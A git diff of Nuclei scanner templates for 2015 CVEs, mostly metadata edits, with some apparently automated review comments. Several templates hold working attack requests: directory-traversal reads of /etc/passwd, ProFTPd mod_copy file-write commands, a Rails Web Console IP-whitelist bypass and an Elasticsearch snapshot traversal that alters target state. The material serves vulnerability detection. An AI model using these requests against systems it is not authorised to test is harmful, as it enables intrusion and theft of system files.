@@ -1,14 +1,18 @@ id: CVE-2015-1427 info: - name: ElasticSearch 1.4.0/1.4.2 RCE + name: ElasticSearch - Remote Code Execution author: pikpikcu severity: critical - description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script. + description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ - tags: cve,cve2015,elastic,rce + - https://nvd.nist.gov/vuln/detail/CVE-2015-1427 + - http://www.securityfocus.com/bid/72585 + classification: + cve-id: CVE-2015-1427 + tags: cve,cve2015,elastic,rce,elasticsearch requests: - raw: @@ -22,6 +26,7 @@ requests: { "name": "test" } + - | POST /_search HTTP/1.1 Host: {{Hostname}} @@ -45,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2015/CVE-2015-1503.yaml b/cves/2015/CVE-2015-1503.yaml index e14c5aac2d..380c04fc63 100644 --- a/cves/2015/CVE-2015-1503.yaml +++ b/cves/2015/CVE-2015-1503.yaml @@ -1,4 +1,5 @@ id: CVE-2015-1503 + info: name: IceWarp Mail Server Directory Traversal author: 0x_Akoko @@ -8,12 +9,13 @@ info: - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html - http://www.icewarp.com - https://nvd.nist.gov/vuln/detail/CVE-2015-1503 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1503 cwe-id: CWE-200 - tags: cve,cve2015,icewarp,lfi + tags: cve,cve2015,icewarp,lfi,mail requests: - method: GET 
diff --git a/cves/2015/CVE-2015-1880.yaml b/cves/2015/CVE-2015-1880.yaml index 9f2f2a251d..9260f68085 100644 --- a/cves/2015/CVE-2015-1880.yaml +++ b/cves/2015/CVE-2015-1880.yaml @@ -8,6 +8,10 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page + - http://www.fortiguard.com/advisory/FG-IR-15-005/ + - http://www.securityfocus.com/bid/74652 + classification: + cve-id: CVE-2015-1880 tags: cve,cve2015,xss,fortigates,ssl requests: @@ -30,4 +34,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/cves/2015/CVE-2015-2067.yaml b/cves/2015/CVE-2015-2067.yaml index 5e4ba266b4..be886e0f23 100644 --- a/cves/2015/CVE-2015-2067.yaml +++ b/cves/2015/CVE-2015-2067.yaml @@ -8,7 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 - tags: cve,cve2015,lfi,magento + - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html + classification: + cve-id: CVE-2015-2067 + tags: cve,cve2015,lfi,magento,magmi,plugin requests: - method: GET @@ -20,7 +23,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml index bf1270a2d5..2a77b1f7f0 100644 --- a/cves/2015/CVE-2015-2068.yaml +++ b/cves/2015/CVE-2015-2068.yaml @@ -8,7 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 - tags: cve,cve2015,magento,xss + - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html + classification: + cve-id: CVE-2015-2068 + tags: cve,cve2015,magento,magmi,xss,plugin requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index 67ed7522de..41ba31406e 100644 
--- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -1,21 +1,21 @@ id: CVE-2015-2080 info: - name: Eclipse Jetty Remote Leakage + name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage author: pikpikcu severity: high + description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header. reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - description: | - The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak - tags: cve,cve2015,jetty + - https://nvd.nist.gov/vuln/detail/CVE-2015-2080 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 + tags: cve,cve2015,jetty requests: - method: POST @@ -33,3 +33,5 @@ requests: words: - "Illegal character 0x0 in state" part: body + +# Enhanced by mp on 2022/04/21 diff --git a/cves/2015/CVE-2015-2166.yaml b/cves/2015/CVE-2015-2166.yaml new file mode 100644 index 0000000000..dedb5e6276 --- /dev/null +++ b/cves/2015/CVE-2015-2166.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2015-2166 + +info: + name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI. + reference: + - https://www.exploit-db.com/exploits/36619 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 + - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html + - http://www.securityfocus.com/bid/73901 + classification: + cve-id: CVE-2015-2166 + tags: cve,cve2015,lfi,ericsson + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index b39565c245..9bd8bf9979 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml 
@@ -4,11 +4,15 @@ info: name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter. reference: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ + - https://wordpress.org/plugins/navis-documentcloud/changelog/ + classification: + cve-id: CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss - description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-3224.yaml b/cves/2015/CVE-2015-3224.yaml new file mode 100644 index 0000000000..f21f392d84 --- /dev/null +++ b/cves/2015/CVE-2015-3224.yaml 
@@ -0,0 +1,43 @@ +id: CVE-2015-3224 + +info: + name: Ruby on Rails Web Console - Remote Code Execution + author: pdteam + severity: critical + description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + reference: + - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ + - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ + - https://hackerone.com/reports/44513 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + classification: + cve-id: CVE-2015-3224 + tags: cve,cve2015,rce,rails,ruby + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + headers: + X-Forwarded-For: ::1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and + + - type: word + part: response + words: + - "X-Web-Console-Session-Id" + - "data-remote-path=" + - "data-session-id=" + case-insensitive: true + condition: or + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml index da62b75d4c..18a0e85813 100644 --- a/cves/2015/CVE-2015-3306.yaml +++ b/cves/2015/CVE-2015-3306.yaml 
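Review bot: The header value `X-Forwarded-For: ::1` in the new CVE-2015-3224 file is a plain scalar that starts with a `:` indicator; most parsers accept it, but it is the kind of value that breaks on stricter or older loaders and it reads as a mapping at first glance, so it should be quoted: `X-Forwarded-For: "::1"`. The `classification:` block again holds only `cve-id`, whereas the older templates in this commit carry `cvss-metrics`, `cvss-score` and `cwe-id` as well.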
@@ -4,9 +4,15 @@ info: name: ProFTPd RCE author: pdteam severity: high - reference: https://github.com/t0kx/exploit-CVE-2015-3306 description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - tags: cve,cve2015,ftp,rce,network + reference: + - https://github.com/t0kx/exploit-CVE-2015-3306 + - https://www.exploit-db.com/exploits/36803/ + - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html + - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html + classification: + cve-id: CVE-2015-3306 + tags: cve,cve2015,ftp,rce,network,proftpd network: - inputs: @@ -17,13 +23,14 @@ network: - data: "site cpfr /tmp/.{{randstr}}\r\n" read: 1024 - data: "site cpto /var/www/html/{{randstr}}\r\n" + host: - - "{{Hostname}}:21" - "{{Hostname}}" + - "{{Host}}:21" read-size: 1024 matchers: - type: word + part: raw words: - "Copy successful" - part: raw \ No newline at end of file diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml index 57306fca9b..9f755b9cac 100644 --- a/cves/2015/CVE-2015-3337.yaml +++ b/cves/2015/CVE-2015-3337.yaml @@ -5,8 +5,14 @@ info: author: pdteam severity: high description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. - reference: https://www.exploit-db.com/exploits/37054/ - tags: cve,cve2015,elastic,lfi + reference: + - https://www.exploit-db.com/exploits/37054/ + - http://www.securityfocus.com/archive/1/535385 + - https://www.elastic.co/community/security + - http://www.debian.org/security/2015/dsa-3241 + classification: + cve-id: CVE-2015-3337 + tags: cve,cve2015,elastic,lfi,elasticsearch,plugin requests: - method: GET @@ -17,7 +23,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status 
diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml index 672f04a518..c1cac6dd15 100644 --- a/cves/2015/CVE-2015-3648.yaml +++ b/cves/2015/CVE-2015-3648.yaml @@ -8,12 +8,16 @@ info: reference: - https://vulners.com/cve/CVE-2015-3648/ - https://www.securityfocus.com/bid/75019 + - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 + - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html + classification: + cve-id: CVE-2015-3648 tags: cve,cve2015,lfi,resourcespace requests: - method: GET path: - - "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" matchers-condition: and matchers: diff --git a/cves/2015/CVE-2015-3897.yaml b/cves/2015/CVE-2015-3897.yaml new file mode 100644 index 0000000000..71779328d7 --- /dev/null +++ b/cves/2015/CVE-2015-3897.yaml 
@@ -0,0 +1,39 @@ +id: CVE-2015-3897 + +info: + name: Bonita BPM 6.5.1 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + description: Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource. + reference: + - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html + - https://www.bonitasoft.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-3897 + - https://www.htbridge.com/advisory/HTB23259 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-3897 + cwe-id: CWE-22 + tags: cve,cve2015,bonita,lfi,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd" + - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/cves/2015/CVE-2015-4050.yaml b/cves/2015/CVE-2015-4050.yaml index a56e9847ee..ccae12fe70 100644 --- a/cves/2015/CVE-2015-4050.yaml +++ b/cves/2015/CVE-2015-4050.yaml 
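Review bot: In the new CVE-2015-3897 file the regex matcher omits `part:` while its sibling word matcher sets `part: body`; nuclei defaults the part to the body as far as I recall, so this is consistency rather than behaviour, but writing `part: body` on both keeps the two branches of the `matchers-condition: or` readable side by side. A one-line comment above the word matcher naming the file it fingerprints (`# win.ini section names`) would also make the three bare words self-explanatory.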
@@ -5,10 +5,14 @@ info: author: ELSFA7110,meme-lord severity: high description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment. - tags: cve,cve2015,symfony,rce reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 + - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access + - http://www.debian.org/security/2015/dsa-3276 + classification: + cve-id: CVE-2015-4050 + tags: cve,cve2015,symfony,rce requests: - method: GET diff --git a/cves/2015/CVE-2015-4414.yaml b/cves/2015/CVE-2015-4414.yaml index ac61202462..59c92e4279 100644 --- a/cves/2015/CVE-2015-4414.yaml +++ b/cves/2015/CVE-2015-4414.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/37274 - https://www.cvedetails.com/cve/CVE-2015-4414 + - https://www.exploit-db.com/exploits/37274/ + - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html + classification: + cve-id: CVE-2015-4414 tags: cve,cve2015,wordpress,wp-plugin,lfi requests: @@ -20,8 +24,8 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2015/CVE-2015-4632.yaml b/cves/2015/CVE-2015-4632.yaml index 6e9567001c..b32d845e51 100644 --- a/cves/2015/CVE-2015-4632.yaml +++ b/cves/2015/CVE-2015-4632.yaml 
@@ -5,15 +5,17 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. - reference: | + reference: - https://www.exploit-db.com/exploits/37388 - https://www.cvedetails.com/cve/CVE-2015-4632 - tags: cve,cve2015,lfi + - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ + - https://www.exploit-db.com/exploits/37388/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2015-4632 cwe-id: CWE-22 + tags: cve,cve2015,lfi requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml index 97b8256f1d..1a6ac1b0f5 100644 --- a/cves/2015/CVE-2015-4694.yaml +++ b/cves/2015/CVE-2015-4694.yaml 
@@ -1,17 +1,21 @@ id: CVE-2015-4694 info: - name: Zip Attachments <= 1.1.4 - Arbitrary File Download + name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. - reference: https://wpscan.com/vulnerability/8047 - tags: lfi,wordpress,cve,cve2015,wp-plugin + description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. + reference: + - https://wordpress.org/plugins/zip-attachments/#developers + - https://wpscan.com/vulnerability/8047 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 + - http://www.vapid.dhs.org/advisory.php?v=126 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2015-4694 cwe-id: CWE-22 + tags: lfi,wordpress,cve,cve2015,wp-plugin requests: - method: GET @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml index e5416a7c9e..37fe790d57 100644 --- a/cves/2015/CVE-2015-5461.yaml +++ b/cves/2015/CVE-2015-5461.yaml @@ -8,6 +8,10 @@ info: reference: - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + - https://wordpress.org/plugins/stageshow/changelog/ + - http://seclists.org/fulldisclosure/2015/Jul/27 + classification: + cve-id: CVE-2015-5461 tags: redirect,cve,cve2015,wordpress,wp-plugin requests: diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml index 37ed1b5e40..4b257f672c 100644 --- a/cves/2015/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml 
@@ -1,19 +1,22 @@ id: CVE-2015-5471 + info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko severity: medium - description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. + description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - tags: cve,cve2015,wordpress,wp-plugin,lfi + - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html + remediation: Upgrade to Swim Team version 1.45 or newer. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET @@ -30,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs on 2022/02/25 diff --git a/cves/2015/CVE-2015-5531.yaml b/cves/2015/CVE-2015-5531.yaml new file mode 100644 index 0000000000..f60c575c93 --- /dev/null +++ b/cves/2015/CVE-2015-5531.yaml 
@@ -0,0 +1,57 @@ +id: CVE-2015-5531 + +info: + name: ElasticSearch directory traversal vulnerability (CVE-2015-5531) + author: princechaddha + severity: high + description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + reference: + - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 + - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html + - https://www.elastic.co/community/security/ + classification: + cve-id: CVE-2015-5531 + tags: cve,cve2015,elasticsearch + +requests: + - raw: + - | + PUT /_snapshot/test HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test" + } + } + + - | + PUT /_snapshot/test2 HTTP/1.1 + Host: {{Hostname}} + + { + "type": "fs", + "settings": { + "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" + } + } + + - | + GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ElasticsearchParseException' + - 'Failed to derive xcontent from' + - '114, 111, 111, 116, 58' + condition: and + + - type: status + status: + - 400 diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index aef5505ea8..91b6573794 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -8,6 +8,9 @@ info: reference: - https://nodesecurity.io/advisories/geddy-directory-traversal - https://github.com/geddy/geddy/issues/697 + - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231 + classification: + cve-id: CVE-2015-5688 tags: cve,cve2015,geddy,lfi requests: @@ -19,7 +22,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status 
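Review bot: The two `PUT /_snapshot/test` and `PUT /_snapshot/test2` requests in the new CVE-2015-5531 template register snapshot repositories on the scanned host, so this template is state-changing and leaves repositories named `test`/`test2` behind rather than being a read-only probe; that should be documented, e.g. a comment above `requests:` such as `# Note: registers two fs snapshot repositories (test, test2) on the target; they persist after the scan.` The hard-coded `location` values presumably only succeed where the target allows that path as a repository location, and a rejected registration makes the final matcher silently never fire, which is worth stating for anyone triaging a negative result. The matcher word `'114, 111, 111, 116, 58'` is opaque; a comment like `# decimal byte values of "root:" as echoed back in the parse error` would help maintainers. Finally, `classification` carries only `cve-id`, while the sibling traversal templates in this commit include `cwe-id: CWE-22`; adding it here keeps the set consistent.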
diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml index 22bd0f786b..ec71bd0334 100644 --- a/cves/2015/CVE-2015-6477.yaml +++ b/cves/2015/CVE-2015-6477.yaml @@ -2,14 +2,15 @@ id: CVE-2015-6477 info: name: Nordex NC2 'username' Parameter XSS + author: geeknik + severity: medium description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 - - author: geeknik - severity: medium + classification: + cve-id: CVE-2015-6477 tags: cve,cve2015,xss,iot,nordex,nc2 requests: diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index 23b0e18646..b0c4f26019 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -6,13 +6,17 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - tags: cve,cve2015,xss,itop + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + - https://www.htbridge.com/advisory/HTB23268 + - http://sourceforge.net/p/itop/tickets/1114/ + - http://sourceforge.net/p/itop/code/3662/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2015-6544 cwe-id: CWE-79 + tags: cve,cve2015,xss,itop requests: - method: GET diff --git a/cves/2015/CVE-2015-6920.yaml b/cves/2015/CVE-2015-6920.yaml index ae97ca5705..555bed6a26 100644 --- a/cves/2015/CVE-2015-6920.yaml +++ b/cves/2015/CVE-2015-6920.yaml 
@@ -8,6 +8,10 @@ info: reference: - https://packetstormsecurity.com/files/133371/ - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 + - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8169 + classification: + cve-id: CVE-2015-6920 tags: cve,cve2015,wordpress,wp-plugin,xss requests: diff --git a/cves/2015/CVE-2015-7297.yaml b/cves/2015/CVE-2015-7297.yaml index b42e4ae2f7..841dc43b36 100644 --- a/cves/2015/CVE-2015-7297.yaml +++ b/cves/2015/CVE-2015-7297.yaml @@ -1,10 +1,16 @@ id: CVE-2015-7297 + info: name: Joomla Core SQL Injection author: princechaddha severity: high - description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. - reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html + description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-7297 + - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html + - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ + classification: + cve-id: CVE-2015-7297 tags: cve,cve2015,joomla,sqli requests: @@ -17,3 +23,5 @@ requests: words: - "cf79ae6addba60ad018347359bd144d2" part: body + +# Enhanced by mp on 2022/03/02 diff --git a/cves/2015/CVE-2015-7377.yaml b/cves/2015/CVE-2015-7377.yaml index 0e95547716..a5229480b0 100644 --- a/cves/2015/CVE-2015-7377.yaml +++ b/cves/2015/CVE-2015-7377.yaml 
@@ -4,11 +4,15 @@ info: name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI. reference: - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 + - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt + classification: + cve-id: CVE-2015-7377 tags: cve,cve2015,wordpress,wp-plugin,xss - description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI." requests: - method: GET diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 8f542a5c14..4f0418f4b2 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml 
@@ -1,20 +1,21 @@ id: CVE-2015-7450 info: - name: IBM WebSphere Java Object Deserialization RCE + name: IBM WebSphere Java Object Deserialization - Remote Code Execution author: wdahlenb severity: critical - description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) + description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce,oast + - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 + tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java requests: - raw: @@ -51,6 +52,8 @@ requests: condition: and - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2015/CVE-2015-7780.yaml 